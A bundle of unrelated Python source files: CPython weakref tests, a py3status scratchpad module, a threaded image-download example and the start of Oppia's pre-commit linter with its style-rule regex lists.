# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakKeyDictionary, False)
def test_threaded_weak_key_dict_deepcopy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakKeyDictionary, True)
def test_threaded_weak_value_dict_copy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakValueDictionary, False)
def test_threaded_weak_value_dict_deepcopy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakValueDictionary, True)
@support.cpython_only
def test_remove_closure(self):
d = weakref.WeakValueDictionary()
self.assertIsNone(d._remove.__closure__)
from test import mapping_tests
class WeakValueDictionaryTestCase(mapping_tests.BasicTestMappingProtocol):
"""Check that WeakValueDictionary conforms to the mapping protocol"""
__ref = {"key1":Object(1), "key2":Object(2), "key3":Object(3)}
type2test = weakref.WeakValueDictionary
def _reference(self):
return self.__ref.copy()
class WeakKeyDictionaryTestCase(mapping_tests.BasicTestMappingProtocol):
"""Check that WeakKeyDictionary conforms to the mapping protocol"""
__ref = {Object("key1"):1, Object("key2"):2, Object("key3"):3}
type2test = weakref.WeakKeyDictionary
def _reference(self):
return self.__ref.copy()
class FinalizeTestCase(unittest.TestCase):
class A:
pass
def _collect_if_necessary(self):
# we create no ref-cycles so in CPython no gc should be needed
if sys.implementation.name != 'cpython':
support.gc_collect()
def test_finalize(self):
def add(x,y,z):
res.append(x + y + z)
return x + y + z
a = self.A()
res = []
f = weakref.finalize(a, add, 67, 43, z=89)
self.assertEqual(f.alive, True)
self.assertEqual(f.peek(), (a, add, (67,43), {'z':89}))
self.assertEqual(f(), 199)
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [199])
res = []
f = weakref.finalize(a, add, 67, 43, 89)
self.assertEqual(f.peek(), (a, add, (67,43,89), {}))
self.assertEqual(f.detach(), (a, add, (67,43,89), {}))
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [])
res = []
f = weakref.finalize(a, add, x=67, y=43, z=89)
del a
self._collect_if_necessary()
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [199])
def test_arg_errors(self):
def fin(*args, **kwargs):
res.append((args, kwargs))
a = self.A()
res = []
f = weakref.finalize(a, fin, 1, 2, func=3, obj=4)
self.assertEqual(f.peek(), (a, fin, (1, 2), {'func': 3, 'obj': 4}))
f()
self.assertEqual(res, [((1, 2), {'func': 3, 'obj': 4})])
with self.assertRaises(TypeError):
weakref.finalize(a, func=fin, arg=1)
with self.assertRaises(TypeError):
weakref.finalize(obj=a, func=fin, arg=1)
self.assertRaises(TypeError, weakref.finalize, a)
self.assertRaises(TypeError, weakref.finalize)
def test_order(self):
a = self.A()
res = []
f1 = weakref.finalize(a, res.append, 'f1')
f2 = weakref.finalize(a, res.append, 'f2')
f3 = weakref.finalize(a, res.append, 'f3')
f4 = weakref.finalize(a, res.append, 'f4')
f5 = weakref.finalize(a, res.append, 'f5')
# make sure finalizers can keep themselves alive
del f1, f4
self.assertTrue(f2.alive)
self.assertTrue(f3.alive)
self.assertTrue(f5.alive)
self.assertTrue(f5.detach())
self.assertFalse(f5.alive)
f5() # nothing because previously unregistered
res.append('A')
f3() # => res.append('f3')
self.assertFalse(f3.alive)
res.append('B')
f3() # nothing because previously called
res.append('C')
del a
self._collect_if_necessary()
# => res.append('f4')
# => res.append('f2')
# => res.append('f1')
self.assertFalse(f2.alive)
res.append('D')
f2() # nothing because previously called by gc
expected = ['A', 'f3', 'B', 'C', 'f4', 'f2', 'f1', 'D']
self.assertEqual(res, expected)
def test_all_freed(self):
# we want a weakrefable subclass of weakref.finalize
class MyFinalizer(weakref.finalize):
pass
a = self.A()
res = []
def callback():
res.append(123)
f = MyFinalizer(a, callback)
wr_callback = weakref.ref(callback)
wr_f = weakref.ref(f)
del callback, f
self.assertIsNotNone(wr_callback())
self.assertIsNotNone(wr_f())
del a
self._collect_if_necessary()
self.assertIsNone(wr_callback())
self.assertIsNone(wr_f())
self.assertEqual(res, [123])
@classmethod
def run_in_child(cls):
def error():
# Create an atexit finalizer from inside a finalizer called
# at exit. This should be the next to be run.
g1 = weakref.finalize(cls, print, 'g1')
print('f3 error')
1/0
# cls should stay alive till atexit callbacks run
f1 = weakref.finalize(cls, print, 'f1', _global_var)
f2 = weakref.finalize(cls, print, 'f2', _global_var)
f3 = weakref.finalize(cls, error)
f4 = weakref.finalize(cls, print, 'f4', _global_var)
assert f1.atexit == True
f2.atexit = False
assert f3.atexit == True
assert f4.atexit == True
def test_atexit(self):
prog = ('from test.test_weakref import FinalizeTestCase;'+
'FinalizeTestCase.run_in_child()')
rc, out, err = script_helper.assert_python_ok('-c', prog)
out = out.decode('ascii').splitlines()
self.assertEqual(out, ['f4 foobar', 'f3 error', 'g1', 'f1 foobar'])
self.assertTrue(b'ZeroDivisionError' in err)
libreftest = """ Doctest for examples in the library reference: weakref.rst
>>> import weakref
>>> class Dict(dict):
... pass
...
>>> obj = Dict(red=1, green=2, blue=3) # this object is weak referencable
>>> r = weakref.ref(obj)
>>> print(r() is obj)
True
>>> import weakref
>>> class Object:
... pass
...
>>> o = Object()
>>> r = weakref.ref(o)
>>> o2 = r()
>>> o is o2
True
>>> del o, o2
>>> print(r())
None
>>> import weakref
>>> class ExtendedRef(weakref.ref):
... def __init__(self, ob, callback=None, **annotations):
... super().__init__(ob, callback)
... self.__counter = 0
... for k, v in annotations.items():
... setattr(self, k, v)
... def __call__(self):
... '''Return a pair containing the referent and the number of
... times the reference has been called.
... '''
... ob = super().__call__()
... if ob is not None:
... self.__counter += 1
... ob = (ob, self.__counter)
... return ob
...
>>> class A: # not in docs from here, just testing the ExtendedRef
... pass
...
>>> a = A()
>>> r = ExtendedRef(a, foo=1, bar="baz")
>>> r.foo
1
>>> r.bar
'baz'
>>> r()[1]
1
>>> r()[1]
2
>>> r()[0] is a
True
>>> import weakref
>>> _id2obj_dict = weakref.WeakValueDictionary()
>>> def remember(obj):
... oid = id(obj)
... _id2obj_dict[oid] = obj
... return oid
...
>>> def id2obj(oid):
... return _id2obj_dict[oid]
...
>>> a = A() # from here, just testing
>>> a_id = remember(a)
>>> id2obj(a_id) is a
True
>>> del a
>>> try:
... id2obj(a_id)
... except KeyError:
... print('OK')
... else:
... print('WeakValueDictionary error')
OK
"""
__test__ = {'libreftest' : libreftest}
def test_main():
support.run_unittest(
ReferencesTestCase,
WeakMethodTestCase,
MappingTestCase,
WeakValueDictionaryTestCase,
WeakKeyDictionaryTestCase,
SubclassableWeakrefTestCase,
FinalizeTestCase,
)
support.run_doctest(sys.modules[__name__])
if __name__ == "__main__":
test_main()
|
scratchpad.py
|
"""
Display number of scratchpad windows and urgency hints.
Configuration parameters:
cache_timeout: refresh interval for i3-msg or swaymsg (default 5)
format: display format for this module
(default "\u232b [\\?color=scratchpad {scratchpad}]")
thresholds: specify color thresholds to use
(default [(0, "darkgray"), (1, "violet")])
Format placeholders:
{scratchpad} number of scratchpads
{urgent} number of urgent scratchpads
Color thresholds:
xxx: print a color based on the value of `xxx` placeholder
Optional:
i3ipc: an improved python library to control i3wm and sway
Examples:
```
# hide zero scratchpad
scratchpad {
format = '[\\?not_zero \u232b [\\?color=scratchpad {scratchpad}]]'
}
# hide non-urgent scratchpad
scratchpad {
format = '[\\?not_zero \u232b {urgent}]'
}
# bring up scratchpads on clicks
scratchpad {
on_click 1 = 'scratchpad show'
}
# add more colors
scratchpad {
thresholds = [
(0, "darkgray"), (1, "violet"), (2, "deepskyblue"), (3, "lime"),
(4, "yellow"), (5, "orange"), (6, "red"), (7, "tomato"),
]
}
```
@author shadowprince (counter), cornerman (async)
@license Eclipse Public License (counter), BSD (async)
SAMPLE OUTPUT
[{'full_text': '\u232b '}, {'full_text': u'0', 'color': '#a9a9a9'}]
violet
[{'full_text': '\u232b '}, {'full_text': u'5', 'color': '#ee82ee'}]
urgent
[{'full_text': '\u232b URGENT 1', 'urgent': True}]
"""
STRING_ERROR = "invalid ipc `{}`"
class Ipc:
"""
"""
def __init__(self, parent):
self.parent = parent
self.setup(parent)
class I3ipc(Ipc):
"""
i3ipc - an improved python library to control i3wm and sway
"""
def setup(self, parent):
from threading import Thread
self.parent.cache_timeout = self.parent.py3.CACHE_FOREVER
self.scratchpad_data = {"scratchpad": 0, "urgent": 0}
t = Thread(target=self.start)
t.daemon = True
t.start()
def start(self):
from i3ipc import Connection
i3 = Connection()
self.update(i3)
for event in ["window::move", "window::urgent"]:
i3.on(event, self.update)
i3.main()
def update(self, i3, event=None):
scratchpad = i3.get_tree().scratchpad()
if not scratchpad:
return
# Workaround for I3ipc 2.2.1 not finding leaves() in sway. Fixing: #2038
leaves = getattr(scratchpad, "floating_nodes", [])
temporary = {
"ipc": self.parent.ipc,
"scratchpad": len(leaves),
"urgent": sum(window.urgent for window in leaves),
}
if self.scratchpad_data != temporary:
self.scratchpad_data = temporary
self.parent.py3.update()
def get_scratchpad_data(self):
return self.scratchpad_data
class Msg(Ipc):
"""
i3-msg - send messages to i3 window manager
swaymsg - send messages to sway window manager
"""
def setup(self, parent):
from json import loads
self.json_loads = loads
wm_msg = {"i3msg": "i3-msg"}.get(parent.ipc, parent.ipc)
self.tree_command = [wm_msg, "-t", "get_tree"]
def get_scratchpad_data(self):
tree = self.json_loads(self.parent.py3.command_output(self.tree_command))
leaves = self.find_scratchpad(tree).get("floating_nodes", [])
return {
"ipc": self.parent.ipc,
"scratchpad": len(leaves),
"urgent": sum(window["urgent"] for window in leaves),
}
def find_scratchpad(self, tree):
if tree.get("name") == "__i3_scratch":
return tree
for x in tree.get("nodes", []):
result = self.find_scratchpad(x)
if result:
return result
return {}
class Py3status:
"""
"""
# available configuration parameters
cache_timeout = 5
format = "\u232b [\\?color=scratchpad {scratchpad}]"
thresholds = [(0, "darkgray"), (1, "violet")]
def post_config_hook(self):
# ipc: specify i3ipc, i3-msg, or swaymsg, otherwise auto
self.ipc = getattr(self, "ipc", "")
if self.ipc in ["", "i3ipc"]:
try:
from i3ipc import Connection # noqa f401
self.ipc = "i3ipc"
except Exception:
if self.ipc:
raise # module not found
self.ipc = (self.ipc or self.py3.get_wm_msg()).replace("-", "")
if self.ipc in ["i3ipc"]:
self.backend = I3ipc(self)
elif self.ipc in ["i3msg", "swaymsg"]:
self.backend = Msg(self)
else:
raise Exception(STRING_ERROR.format(self.ipc))
self.thresholds_init = self.py3.get_color_names_list(self.format)
def scratchpad(self):
scratchpad_data = self.backend.get_scratchpad_data()
for x in self.thresholds_init:
if x in scratchpad_data:
self.py3.threshold_get_color(scratchpad_data[x], x)
response = {
"cached_until": self.py3.time_in(self.cache_timeout),
"full_text": self.py3.safe_format(self.format, scratchpad_data),
}
if scratchpad_data["urgent"]:
response["urgent"] = True
return response
if __name__ == "__main__":
"""
Run module in test mode.
"""
from py3status.module_test import module_test
config = {"format": r"\[{ipc}\] [\?color=scratchpad {scratchpad}]"}
module_test(Py3status, config=config)
|
threaded_download.py
|
#sequential download
import urllib.request
def downloadImage(imagePath, fileName):
print("downloading image from ", imagePath)
urllib.request.urlretrieve(imagePath, fileName)
print("Completed Download")
def main_sequential():
t0 = time.time()
for i in range(10):
imageName = "temp/image-" + str(i) + ".jpg"
# generate a imageName which includes the temp/ directory, a string representation of what
# iteration we are currently at--str(i)--and the file extension .jpg
downloadImage("http://lorempixel.com/400/200/sports", imageName) #gives us a random image
t1 = time.time()
totalTime = t1 - t0
print("main_sequential total execution time {}".format(totalTime))
#Concurrent Download
import threading
import urllib.request
import time
def executeThread(i):
imageName = imageName = "temp/image-" + str(i) + ".jpg"
downloadImage("http://lorempixel.com/400/200/sports/", imageName)
def main_threaded():
t0 = time.time()
#create an array which will store a reference to all our threads
threads = []
# create 10 threads, append them to our array of threads and start them off
for i in range(10):
thread = threading.Thread(target=executeThread, args=(i, ))
threads.append(thread)
thread.start()
# ensure that all the threads in our array have completed their execution
# before we log the total time to complete
for i in threads:
i.join()
# calculate the total execution time
t1 = time.time()
totalTime = t1 - t0
print("main_threaded total execution time {}".format(totalTime))
if __name__ == '__main__':
# main_sequential()
main_threaded()
|
pre_commit_linter.py
|
# coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Pre-commit script for Oppia.
This script lints Python and JavaScript code, and prints a
list of lint errors to the terminal. If the directory path is passed,
it will lint all Python and JavaScript files in that directory; otherwise,
it will only lint files that have been touched in this commit.
This script ignores all filepaths contained within .eslintignore.
=====================
CUSTOMIZATION OPTIONS
=====================
1. To lint only files that have been touched in this commit
python -m scripts.pre_commit_linter
2. To lint all files in the folder or to lint just a specific file
python -m scripts.pre_commit_linter --path filepath
3. To lint a specific list of files (*.js/*.py only). Separate files by spaces
python -m scripts.pre_commit_linter --files file_1 file_2 ... file_n
4. To lint files in verbose mode
python -m scripts.pre_commit_linter --verbose
Note that the root folder MUST be named 'oppia'.
"""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
# Pylint has issues with the import order of argparse.
# pylint: disable=wrong-import-order
import abc
import argparse
import ast
import collections
import contextlib
import fnmatch
import glob
import multiprocessing
import os
import re
import shutil
import subprocess
import sys
import tempfile
import threading
import time
# Install third party dependencies before proceeding.
from . import install_third_party_libs
install_third_party_libs.main(args=[])
# pylint: disable=wrong-import-position
import python_utils # isort:skip
_PARSER = argparse.ArgumentParser()
_EXCLUSIVE_GROUP = _PARSER.add_mutually_exclusive_group()
_EXCLUSIVE_GROUP.add_argument(
'--path',
help='path to the directory with files to be linted',
action='store')
_EXCLUSIVE_GROUP.add_argument(
'--files',
nargs='+',
help='specific files to be linted. Space separated list',
action='store')
_PARSER.add_argument(
'--verbose',
help='verbose mode. All details will be printed.',
action='store_true')
EXCLUDED_PHRASES = [
'utf', 'pylint:', 'http://', 'https://', 'scripts/', 'extract_node']
EXCLUDED_PATHS = (
'third_party/*', 'build/*', '.git/*', '*.pyc', 'CHANGELOG',
'integrations/*', 'integrations_dev/*', '*.svg', '*.gif',
'*.png', '*.zip', '*.ico', '*.jpg', '*.min.js', 'backend_prod_files/*',
'assets/scripts/*', 'core/tests/data/*', 'core/tests/build_sources/*',
'*.mp3', '*.mp4', 'node_modules/*', 'typings/*', 'local_compiled_js/*',
'webpack_bundles/*', 'core/tests/services_sources/*',
'core/tests/release_sources/tmp_unzip.zip',
'core/tests/release_sources/tmp_unzip.tar.gz')
GENERATED_FILE_PATHS = (
'extensions/interactions/LogicProof/static/js/generatedDefaultData.ts',
'extensions/interactions/LogicProof/static/js/generatedParser.ts',
'core/templates/dev/head/expressions/expression-parser.service.js')
CONFIG_FILE_PATHS = (
'core/tests/.browserstack.env.example',
'core/tests/protractor.conf.js',
'core/tests/karma.conf.ts',
'core/templates/dev/head/mathjaxConfig.ts',
'assets/constants.ts',
'assets/rich_text_components_definitions.ts',
'webpack.config.ts',
'webpack.dev.config.ts',
'webpack.prod.config.ts')
BAD_PATTERNS = {
'__author__': {
'message': 'Please remove author tags from this file.',
'excluded_files': (),
'excluded_dirs': ()},
'datetime.datetime.now()': {
'message': 'Please use datetime.datetime.utcnow() instead of'
'datetime.datetime.now().',
'excluded_files': (),
'excluded_dirs': ()},
'\t': {
'message': 'Please use spaces instead of tabs.',
'excluded_files': (),
'excluded_dirs': (
'assets/i18n/', 'core/tests/build_sources/assets/')},
'\r': {
'message': 'Please make sure all files only have LF endings (no CRLF).',
'excluded_files': (),
'excluded_dirs': ()},
'<<<<<<<': {
'message': 'Please fully resolve existing merge conflicts.',
'excluded_files': (),
'excluded_dirs': ()},
'>>>>>>>': {
'message': 'Please fully resolve existing merge conflicts.',
'excluded_files': (),
'excluded_dirs': ()},
'glyphicon': {
'message': 'Please use equivalent material-icons '
'instead of glyphicons.',
'excluded_files': (),
'excluded_dirs': ()}
}
BAD_PATTERNS_REGEXP = [
{
'regexp': re.compile(r'TODO[^\(]*[^\)][^:]*[^\w]*$'),
'message': 'Please assign TODO comments to a user '
'in the format TODO(username): XXX. ',
'excluded_files': (),
'excluded_dirs': ()
}
]
BAD_PATTERNS_JS_AND_TS_REGEXP = [
{
'regexp': re.compile(r'\b(browser.explore)\('),
'message': 'In tests, please do not use browser.explore().',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\b(browser.pause)\('),
'message': 'In tests, please do not use browser.pause().',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\b(browser.sleep)\('),
'message': 'In tests, please do not use browser.sleep().',
'excluded_files': (
# TODO(#7622): Remove the file from the excluded list. Remove the
# TODO in core/tests/protractor_desktop/embedding.js pointing to the
# same issue. The following was placed due to a necessary sleep as
# a temporary measure to keep the embedding tests from failing.
'core/tests/protractor_desktop/embedding.js'
),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\b(browser.waitForAngular)\('),
'message': 'In tests, please do not use browser.waitForAngular().',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\b(ddescribe|fdescribe)\('),
'message': 'In tests, please use \'describe\' instead of \'ddescribe\''
'or \'fdescribe\'',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\b(iit|fit)\('),
'message': 'In tests, please use \'it\' instead of \'iit\' or \'fit\'',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\b(beforeEach\(inject\(function)\('),
'message': 'In tests, please use \'angular.mock.inject\' instead of '
'\'inject\'',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'templateUrl: \''),
'message': 'The directives must be directly referenced.',
'excluded_files': (
'core/templates/dev/head/pages/exploration-player-page/'
'FeedbackPopupDirective.js'
),
'excluded_dirs': (
'extensions/answer_summarizers/',
'extensions/classifiers/',
'extensions/dependencies/',
'extensions/value_generators/',
'extensions/visualizations/')
},
{
'regexp': re.compile(r'\$parent'),
'message': 'Please do not access parent properties ' +
'using $parent. Use the scope object' +
'for this purpose.',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'require\(.*\.\..*\);'),
'message': 'Please, don\'t use relative imports in require().',
'excluded_files': (),
'excluded_dirs': ('core/tests/')
}
]
MANDATORY_PATTERNS_REGEXP = [
{
'regexp': re.compile(
r'Copyright \d{4} The Oppia Authors\. All Rights Reserved\.'),
'message': 'Please ensure this file should contain a proper '
'copyright notice.',
'included_types': ('.py', '.js', '.sh', '.ts'),
'excluded_files': GENERATED_FILE_PATHS + CONFIG_FILE_PATHS + (
'__init__.py', ),
'excluded_dirs': EXCLUDED_PATHS
},
{
'regexp': re.compile('from __future__ import unicode_literals'),
'message': 'Please ensure this file should contain unicode_literals '
'future import.',
'included_types': ('.py'),
'excluded_files': GENERATED_FILE_PATHS + CONFIG_FILE_PATHS + (
'__init__.py',),
'excluded_dirs': EXCLUDED_PATHS
}
]
MANDATORY_PATTERNS_JS_REGEXP = [
{
'regexp': re.compile(r'^\s\*\s@fileoverview\s[a-zA-Z0-9_]+'),
'message': 'Please ensure this file should contain a file '
'overview i.e. a short description of the file.',
'included_types': ('.js', '.ts'),
'excluded_files': GENERATED_FILE_PATHS + CONFIG_FILE_PATHS,
'excluded_dirs': EXCLUDED_PATHS
}
]
BAD_LINE_PATTERNS_HTML_REGEXP = [
{
'regexp': re.compile(r'text\/ng-template'),
'message': 'The directives must be directly referenced.',
'excluded_files': (),
'excluded_dirs': (
'extensions/answer_summarizers/',
'extensions/classifiers/',
'extensions/objects/',
'extensions/value_generators/')
},
{
'regexp': re.compile(r'[ \t]+$'),
'message': 'There should not be any trailing whitespaces.',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\$parent'),
'message': 'Please do not access parent properties ' +
'using $parent. Use the scope object' +
'for this purpose.',
'excluded_files': (),
'excluded_dirs': ()
}
]
BAD_PATTERNS_PYTHON_REGEXP = [
{
'regexp': re.compile(r'\Wprint\('),
'message': 'Please do not use print statement.',
'excluded_files': (
'core/tests/test_utils.py',
'core/tests/performance_framework/perf_domain.py'),
'excluded_dirs': ('scripts/',)
},
{
'regexp': re.compile(r'\sprint\('),
'message': 'Please use python_utils.PRINT().',
'excluded_files': ('python_utils.py'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'# pylint:\s*disable=[A-Z][0-9]{4}'),
'message': 'Please remove pylint exclusion if it is unnecessary, or '
'make it human readable with a sentence instead of an id. '
'The id-to-message list can be seen '
'here->http://pylint-messages.wikidot.com/all-codes',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'self.assertEquals\('),
'message': 'Please do not use self.assertEquals method. ' +
'This method has been deprecated. Instead use ' +
'self.assertEqual method.',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'with open\(|= open\('),
'message': 'Please use python_utils.open_file() instead of open().',
'excluded_files': ('python_utils.py'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'StringIO'),
'message': 'Please use python_utils.string_io() instead of ' +
'import StringIO.',
'excluded_files': ('python_utils.py', 'python_utils_test.py'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'urllib\..*quote\('),
'message': 'Please use python_utils.url_quote().',
'excluded_files': ('python_utils.py', 'python_utils_test.py'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'urllib\..*unquote_plus\('),
'message': 'Please use python_utils.url_unquote_plus().',
'excluded_files': ('python_utils.py', 'python_utils_test.py'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'urllib\..*urlencode\('),
'message': 'Please use python_utils.url_encode().',
'excluded_files': ('python_utils.py', 'python_utils_test.py'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'urllib\..*urlretrieve\('),
'message': 'Please use python_utils.url_retrieve().',
'excluded_files': ('python_utils.py', 'python_utils_test.py'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'urllib(2)?\..*urlopen\('),
'message': 'Please use python_utils.url_open().',
'excluded_files': ('python_utils.py', 'python_utils_test.py'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'urlsplit'),
'message': 'Please use python_utils.url_split().',
'excluded_files': ('python_utils.py'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'urlparse'),
'message': 'Please use python_utils.url_parse().',
'excluded_files': ('python_utils.py'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'urlunsplit'),
'message': 'Please use python_utils.url_unsplit().',
'excluded_files': ('python_utils.py'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'parse_qs'),
'message': 'Please use python_utils.parse_query_string().',
'excluded_files': ('python_utils.py'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\Wunquote\('),
'message': 'Please use python_utils.urllib_unquote().',
'excluded_files': ('python_utils.py'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'urljoin'),
'message': 'Please use python_utils.url_join().',
'excluded_files': ('python_utils.py'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'urllib(2)?\..*Request\('),
'message': 'Please use python_utils.url_request().',
'excluded_files': ('python_utils.py', 'python_utils_test.py'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'[^.|\w]input\('),
'message': 'Please use python_utils.INPUT.',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'[^.|\w|\s]map\('),
'message': 'Please use python_utils.MAP.',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\Wnext\('),
'message': 'Please use python_utils.NEXT.',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'object\):'),
'message': 'Please use python_utils.OBJECT.',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\Wrange\('),
'message': 'Please use python_utils.RANGE.',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\Wround\('),
'message': 'Please use python_utils.ROUND.',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\Wstr\('),
'message': (
'Please try to use python_utils.convert_to_bytes() for the strings '
'used in webapp2\'s built-in methods or for strings used directly '
'in NDB datastore models. If you need to cast ints/floats to '
'strings, please use python_utils.UNICODE() instead.'),
'excluded_files': ('python_utils.py'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'\Wzip\('),
'message': 'Please use python_utils.ZIP.',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'basestring'),
'message': 'Please use python_utils.BASESTRING.',
'excluded_files': ('python_utils.py'),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'__metaclass__'),
'message': 'Please use python_utils.with_metaclass().',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'iteritems'),
'message': 'Please use items() instead.',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'itervalues'),
'message': 'Please use values() instead.',
'excluded_files': (),
'excluded_dirs': ()
},
{
'regexp': re.compile(r'iterkeys'),
'message': 'Please use keys() instead.',
'excluded_files': (),
'excluded_dirs': ()
}
]
BAD_PATTERNS_MAP = {
'.js': BAD_PATTERNS_JS_AND_TS_REGEXP,
'.ts': BAD_PATTERNS_JS_AND_TS_REGEXP,
'.html': BAD_LINE_PATTERNS_HTML_REGEXP,
'.py': BAD_PATTERNS_PYTHON_REGEXP
}
REQUIRED_STRINGS_CONSTANTS = {
'DEV_MODE: true': {
'message': 'Please set the DEV_MODE variable in constants.ts'
'to true before committing.',
'excluded_files': ()
}
}
ALLOWED_TERMINATING_PUNCTUATIONS = ['.', '?', '}', ']', ')']
CODEOWNER_FILEPATH = '.github/CODEOWNERS'
# This list needs to be in sync with the important patterns in the CODEOWNERS
# file.
CODEOWNER_IMPORTANT_PATHS = [
'/core/controllers/acl_decorators*.py',
'/core/controllers/base*.py',
'/core/domain/html*.py',
'/core/domain/rights_manager*.py',
'/core/domain/role_services*.py',
'/core/domain/user*.py',
'/core/storage/',
'/export/',
'/manifest.json',
'/package.json',
'/yarn.lock',
'/scripts/install_third_party_libs.py',
'/.github/']
if not os.getcwd().endswith('oppia'):
python_utils.PRINT('')
python_utils.PRINT(
'ERROR Please run this script from the oppia root directory.')
_PARENT_DIR = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
_PYLINT_PATH = os.path.join(_PARENT_DIR, 'oppia_tools', 'pylint-1.9.4')
if not os.path.exists(_PYLINT_PATH):
python_utils.PRINT('')
python_utils.PRINT(
'ERROR Please run install_third_party_libs.py first to install pylint')
python_utils.PRINT(' and its dependencies.')
sys.exit(1)
_PATHS_TO_INSERT = [
_PYLINT_PATH,
os.getcwd(),
os.path.join(
_PARENT_DIR, 'oppia_tools', 'google_appengine_1.9.67',
'google_appengine', 'lib', 'webapp2-2.3'),
os.path.join(
_PARENT_DIR, 'oppia_tools', 'google_appengine_1.9.67',
'google_appengine', 'lib', 'yaml-3.10'),
os.path.join(
_PARENT_DIR, 'oppia_tools', 'google_appengine_1.9.67',
'google_appengine', 'lib', 'jinja2-2.6'),
os.path.join(
_PARENT_DIR, 'oppia_tools', 'google_appengine_1.9.67',
'google_appengine'),
os.path.join(_PARENT_DIR, 'oppia_tools', 'webtest-2.0.33'),
os.path.join(_PARENT_DIR, 'oppia_tools', 'browsermob-proxy-0.8.0'),
os.path.join(_PARENT_DIR, 'oppia_tools', 'esprima-4.0.1'),
os.path.join(_PARENT_DIR, 'oppia_tools', 'pycodestyle-2.5.0'),
os.path.join(_PARENT_DIR, 'oppia_tools', 'pylint-quotes-0.1.8'),
os.path.join(_PARENT_DIR, 'oppia_tools', 'selenium-3.13.0'),
os.path.join(_PARENT_DIR, 'oppia_tools', 'PyGithub-1.43.7'),
os.path.join(_PARENT_DIR, 'oppia_tools', 'Pillow-6.0.0'),
os.path.join('third_party', 'backports.functools_lru_cache-1.5'),
os.path.join('third_party', 'beautifulsoup4-4.7.1'),
os.path.join('third_party', 'bleach-3.1.0'),
os.path.join('third_party', 'callbacks-0.3.0'),
os.path.join('third_party', 'gae-cloud-storage-1.9.22.1'),
os.path.join('third_party', 'gae-mapreduce-1.9.22.0'),
os.path.join('third_party', 'gae-pipeline-1.9.22.1'),
os.path.join('third_party', 'mutagen-1.42.0'),
os.path.join('third_party', 'soupsieve-1.9.1'),
os.path.join('third_party', 'six-1.12.0'),
os.path.join('third_party', 'webencodings-0.5.1'),
]
for path in _PATHS_TO_INSERT:
sys.path.insert(0, path)
# pylint: disable=wrong-import-order
# pylint: disable=wrong-import-position
import isort # isort:skip
import pycodestyle # isort:skip
import esprima # isort:skip
from pylint import lint # isort:skip
from . import build # isort:skip
from . import docstrings_checker # isort:skip
import html.parser # isort:skip
# pylint: enable=wrong-import-order
# pylint: enable=wrong-import-position
_MESSAGE_TYPE_SUCCESS = 'SUCCESS'
_MESSAGE_TYPE_FAILED = 'FAILED'
_TARGET_STDOUT = python_utils.string_io()
